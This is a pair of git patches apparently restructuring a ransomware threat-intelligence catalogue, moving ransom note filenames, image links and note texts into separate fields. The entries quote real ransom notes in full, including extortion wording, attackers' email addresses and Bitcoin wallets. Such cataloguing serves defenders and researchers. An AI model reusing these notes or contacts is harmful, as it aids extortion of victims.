"refs": [ @@ -12717,7 +12989,7 @@ ], "payment-method": "Bitcoin", "price": "0.00000001", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsPVGaHXcAAtnXz[1].jpg" ], "refs": [ @@ -12736,11 +13008,13 @@ ], "payment-method": "Bitcoin", "price": "999999.5", - "ransomnotes": [ - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsiUA0LXgAAoqkd[1].jpg", - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsuMFrZW0AIIUXs[1].jpg", + "ransomnotes-filenames": [ "!=How_recovery_files=!.html" ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsiUA0LXgAAoqkd[1].jpg", + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsuMFrZW0AIIUXs[1].jpg" + ], "refs": [ "https://twitter.com/petrovic082/status/1065223932637315074", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/", @@ -12761,7 +13035,7 @@ ], "payment-method": "Bitcoin", "price": "0.00000001", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/30/Ds4IYbfWsAECNuJ[1].jpg", "https://pbs.twimg.com/media/Ds4IKL3X4AIHKrj.jpg", "https://pbs.twimg.com/media/Ds4IYbfWsAECNuJ.jpg" @@ -12784,9 +13058,11 @@ "payment-method": "Bitcoin", "price": "1", "ransomnotes": [ - "_How_To_Decrypt_My_File_.txt", "I am sorry to tell you.\nSome files has crypted\nif you want your files back , send 1 bitcoin to my wallet\nmy wallet address : 3HCBsZ6QQTnSsthbmVtYE4XSZtism4j7qd\nIf you have any questions, please contact us.\n\nEmail:[nmare@cock.li]" ], + "ransomnotes-filenames": [ + "_How_To_Decrypt_My_File_.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1067109661076262913", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/" @@ -12817,7 +13093,7 @@ ".israbye" ], "payment-method": "Politic", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/Dtlxf0eW4AAJCdZ[1].jpg", "https://pbs.twimg.com/media/DtlxfFsW4AAs-Co.jpg" ], @@ -12836,7 +13112,7 @@ "prepend (encrypted)" ], "payment-method": "Bitcoin Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/DtkQKCDWoAM13kD[1].jpg" ], "refs": [ @@ -12864,9 +13140,11 @@ ".FJ7QvaR9VUmi" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ + "DECRYPT.txt" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/Dtz4PD2WoAIWtRv.jpg", - "DECRYPT.txt", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/14/Dt-APfCW0AADWV8[1].jpg" ], "refs": [ @@ -12889,7 +13167,7 @@ ], "payment-method": "Bitcoin", "price": "900 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/Dt1_DpMXcAMC8J_[1].jpg" ], "refs": [ @@ -12922,8 +13200,10 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ - "README_BACK_FILES.htm", + "ransomnotes-filenames": [ + "README_BACK_FILES.htm" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/Dt4xTDjWwAEBjBh.jpg" ], "refs": [ @@ -12943,9 +13223,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "!!!READ_IT!!!.txt", "!!! ATTENTION, YOUR FILES WERE ENCRYPTED !!!\n\nPlease follow few steps below:\n\n1.Send us your ID.\n2.We can decrypt 1 file what would you make sure that we have decription tool!\n3.Then you'll get payment instruction and after payment you will get your decryption tool!\n\n\n Do not try to rename files!!! Only we can decrypt all your data!\n\n Contact us:\n\ngetmydata@india.com\nmydataback@aol.com\n\n Your ID:[redacted 64 uppercase hex]:[redacted 64 uppercase hex with dashes]\n[redacted 64 uppercase hex with dashes]:[redacted 64 uppercase hex with dashes]" ], + "ransomnotes-filenames": [ + "!!!READ_IT!!!.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1072164314608480257" ] @@ -12959,8 +13241,10 @@ ".locked" ], "payment-method": "Email", - "ransomnotes": [ - "ODSZYFRFUJ_PLIKI_TERAZ.txt", + "ransomnotes-filenames": [ + "ODSZYFRFUJ_PLIKI_TERAZ.txt" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/DuIsIoWXQAEGKlr.jpg" ], "refs": [ @@ -12977,9 +13261,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "_openme.txt", "---------------------------------------------- ALL YOUR FILES ARE ENCRYPTED ----------------------------------------------- \n\nDon't worry, you can return all your files!\nAll your files documents, photos, databases and other important are encrypted with strongest encryption and unique key.\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\nThis software will decrypt all your encrypted files.\nWhat guarantees do we give to you?\nYou can send one of your encrypted file from your PC and we decrypt it for free.\nBut we can decrypt only 1 file for free. File must not contain valuable information\nDon't try to use third-party decrypt tools because it will destroy your files.\nDiscount 50% available if you contact us first 72 hours.\n\n---------------------------------------------------------------------------------------------------------------------------\n\n\nTo get this software you need write on our e-mail:\nhelpshadow@india.com\n\nReserve e-mail address to contact us:\nhelpshadow@firemail.cc\n\nYour personal ID:\n[redacted 43 alphanumeric chars]" ], + "ransomnotes-filenames": [ + "_openme.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1072907748155842565" ] @@ -13152,4 +13438,4 @@ } ], "version": 62 -} +} \ No newline at end of file From f5a7efaadc81b2cdb1e9b3589ef5c4a4d365cbca Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 23 May 2019 12:39:53 +0200 Subject: [PATCH 49/50] jq --- clusters/ransomware.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 7ea0968..3a97015 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -13438,4 +13438,4 @@ } ], "version": 62 -} \ No newline at end of file +} From 9d8d5ce1c845a2ee7679b46f930a3b88300b4142 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 23 May 2019 16:23:09 +0200 Subject: [PATCH 50/50] fix ransomware ransomnotes --- clusters/ransomware.json | 48 ++++++++++++++++++++++++++-------------- 1 file changed, 31 insertions(+), 17 deletions(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 3a97015..1eae530 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -94,7 +94,7 @@ "meta": { "date": "March 2017", "encryption": "AES-128", - "ransomnotes-filenames": [ + "ransomnotes": [ "DANGEROUS_RANSOM\nHacked.\nPlease contact\nhakermail@someting.com" ], "refs": [ @@ -695,7 +695,7 @@ "extensions": [ ".damage" ], - "ransomnotes-filenames": [ + "ransomnotes": [ "TtWGgOd57SvPlkgZ***\n ==========\n end of secret_key \nTo restore your files - send e-mail to damage@india.com" ], "refs": [ @@ -1302,10 +1302,12 @@ ".<7_random_letters>" ], "payment-method": "Email", + "ransomnotes": [ + "WARNING! Your personal files are encrypted! Your most important files on this computer have been encrypted: photos, documents, videos, music, etc. You can verify this by trying to open such files. Encryption was produced using an UNIQUE public RSA-4096 key, specially generated for this computer only, thus making it impossible to decrypt such files without knowing private key and comprehensive decipher software. We have left on our server a copy of the private key, along with all required software for the decryption. To make sure that software is working as intended you have a possibility to decrypt one file for free, see contacts below. The private key will be destroyed after 7 days, afterwards making it impossible to decrypt your files. Encryption date: *** Private key destruction date: *** For obtaining decryption software, please, contact: myserverdoctor@gmail.com or XMPP jabber: doctordisk@jabbim.com" + ], "ransomnotes-filenames": [ "encrypted_readme.txt", - "__encrypted_readme.txt", - "WARNING! Your personal files are encrypted! Your most important files on this computer have been encrypted: photos, documents, videos, music, etc. You can verify this by trying to open such files. Encryption was produced using an UNIQUE public RSA-4096 key, specially generated for this computer only, thus making it impossible to decrypt such files without knowing private key and comprehensive decipher software. We have left on our server a copy of the private key, along with all required software for the decryption. To make sure that software is working as intended you have a possibility to decrypt one file for free, see contacts below. The private key will be destroyed after 7 days, afterwards making it impossible to decrypt your files. Encryption date: *** Private key destruction date: *** For obtaining decryption software, please, contact: myserverdoctor@gmail.com or XMPP jabber: doctordisk@jabbim.com" + "__encrypted_readme.txt" ], "ransomnotes-refs": [ "https://2.bp.blogspot.com/-CLo4JTpveKY/WI4sVXEQSPI/AAAAAAAADcU/n8qrwehDEQMlG845cjNow_fC4PDqlvPIQCLcB/s1600/note_2.png" @@ -3686,15 +3688,15 @@ "ransomnotes": [ "all your data has been locked us\nYou want to return?\nwrite email paymentbtc@firemail.cc", "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\nWrite this ID in the title of your message ACBFF130\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\nAttention!\nDo not rename encrypted files.\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", - "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam." + "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.", + "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com" ], "ransomnotes-filenames": [ "README.txt", "README.jpg", "Info.hta", "FILES ENCRYPTED.txt", - "INFO.hta", - "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com" + "INFO.hta" ], "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg", @@ -4716,7 +4718,7 @@ "encryption": "AES-256", "payment-method": "Bitcoin", "price": "2", - "ransomnotes-filenames": [ + "ransomnotes": [ "Attention! ! ! All of your copies of your system have been permanently deleted and the data on all partitions and workstations have been encrypted! Stay calm. You can recover all your data by making a payment of 2 BTC (1200 USD) in Bitcoin currency to receive a decryption key. To purchase Bitcions you can use www.coinbase.com After buying BTC send the equivalent of 2 BTC (1200 USD) to our BTC adress : 16jX5RbF2pEcLYHPukazWhDCkxXTs7ZCxB After payment contact us to receive your decryption key. In mail title write your unique ID: {custom id visually resembling a MAC address} Our e-mail: crypt302@gmx.com" ], "refs": [ @@ -6541,7 +6543,14 @@ "payment-method": "Bitcoin", "price": "1.2 (500$) - 2.4", "ransomnotes-filenames": [ - "de_crypt_readme.bmp, .txt, .html" + "de_crypt_readme.bmp", + "de_crypt_readme.txt", + "de_crypt_readme.html", + "[victim_id].html", + "[victim_id].bmp", + "!Recovery_[victim_id].bmp", + "!Recovery_[victim_id].html", + "!Recovery_[victim_id].txt" ], "refs": [ "https://support.kaspersky.com/viruses/disinfection/8547", @@ -6573,7 +6582,9 @@ "payment-method": "Bitcoin", "price": "1.2 (500$) - 2.4", "ransomnotes-filenames": [ - ".txt, .html, .bmp" + ".txt", + ".html", + ".bmp" ], "refs": [ "https://support.kaspersky.com/viruses/disinfection/8547", @@ -7470,7 +7481,8 @@ "payment-method": "Bitcoin", "price": "0.5(190 - 250 $)", "ransomnotes-filenames": [ - "UNLOCK_FILES_INSTRUCTIONS.html and .txt" + "UNLOCK_FILES_INSTRUCTIONS.html", + "UNLOCK_FILES_INSTRUCTIONS.txt" ], "refs": [ "http://www.bleepingcomputer.com/forums/t/611342/gnl-locker-support-and-help-topic-locked-and-unlock-files-instructionshtml/", @@ -11564,13 +11576,13 @@ "Hello... :)\nFor instructions on how to recovery the files, write to me:\njonskuper578@india.com\njonskuper578@gmx.de\njonskuper578@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again.", "WARNING!!!\nYour ID 83624883\nOUR FILES ARE DECRIPTED\nYour documents, photos, database, save games and other important data was encrypted.\nData recovery the necessary interpreter. To get the interpreter, should send an email to helppme@india.com or hepl1112@aol.com.\nIn a letter to include Your personal ID (see the beginning of this document).\nIn response to the letter You will receive the address of your Bitcoin wallet to which you want to perform the transfer.\nWhen money transfer is confirmed, You will receive the decrypter file for Your computer.\nAfter starting the programm-interpreter, all Your files will be restored.\nAttention! Do not attempt to remove a program or run the anti-virus tools.", "ПРЕДУПРЕЖДЕНИЕ!!!\nВаш ID 83624883\nOUR FILES ARE DECRIPTED\nЗашифрованы ваши документы, фотографии, база данных, сохранения игр и другие важные данные.\nВосстановить данные нужен интерпретатор. Для получения интерпретатора надо отправить email на helppme@india.com или hepl1112@aol.com.\nВ письме укажите Ваш личный ID (см. начало этого документа).\nВ ответ на письмо Вы получите адрес вашего биткойн-кошелька, на который Вы хотите сделать перевод.\nКогда денежный перевод будет подтвержден, вы получите файл-декриптер для Вашего компьютера.\nПосле запуска программы-интерпретатора все Ваши файлы будут восстановлены.\nВнимание! Не пытайтесь удалить программу или запустить антивирусные программы.", - "Hello…\nFor instructions on how to recovery the files, write to me:\nvine77725@gmx.de\nvine77725@india.com\nvine77725@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again." + "Hello…\nFor instructions on how to recovery the files, write to me:\nvine77725@gmx.de\nvine77725@india.com\nvine77725@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again.", + "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com", + "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com" ], "ransomnotes-filenames": [ "How_return_files.txt", - "Image.jpg", - "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com", - "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com" + "Image.jpg" ], "ransomnotes-refs": [ "https://4.bp.blogspot.com/-6jE-GW6wCr8/WQY1L_uHsFI/AAAAAAAAE-A/3YR0bwwBJqgp8CsApZq4F_44JkMB0m2WwCLcB/s320/image-note.jpg", @@ -12949,10 +12961,12 @@ ], "payment-method": "Bitcoin", "price": "300 $", - "ransomnotes-filenames": [ - "how to get back you files.txt", + "ransomnotes": [ "Attention MOTHERFUCKER!\n\nAll your main files were encrypted!\n\nYour personal files (documents, databases, jpeg, docx, doc,\netc.) were encrypted, their further using impossible.\nTO DECRYPT YOUR FILES YOU NEED TO BUY A SOFTWARE WITH YOUR UNIQUE PRIVATE KEY. ONLY OUR\nSOFTWARE WILL ALLOW YOU DECRYPT YOUR FILES.\nNOTE:\nYou have only 6 hours from the moment when an encryption was done to buy our software at $300, in bitcoin\nYou all files will get deleted after the lapse of 6 hours.\nAny attempts to remove this encryption will be unsuccessful. You cannot do this without our software with your key.\nDo not send any emails with threats and rudeness to us. Example of email format: Hi, I need a decryption of my files.\n\nBitcoin address = 1GstvLM6SumX3TMMgN9PvXQsEy3FR9ZqWX\n\nContact us by email only: ayaan321308@gmail.com" ], + "ransomnotes-filenames": [ + "how to get back you files.txt" + ], "ransomnotes-refs": [ "https://pbs.twimg.com/media/DrkmCriWwAMCdqF.jpg" ],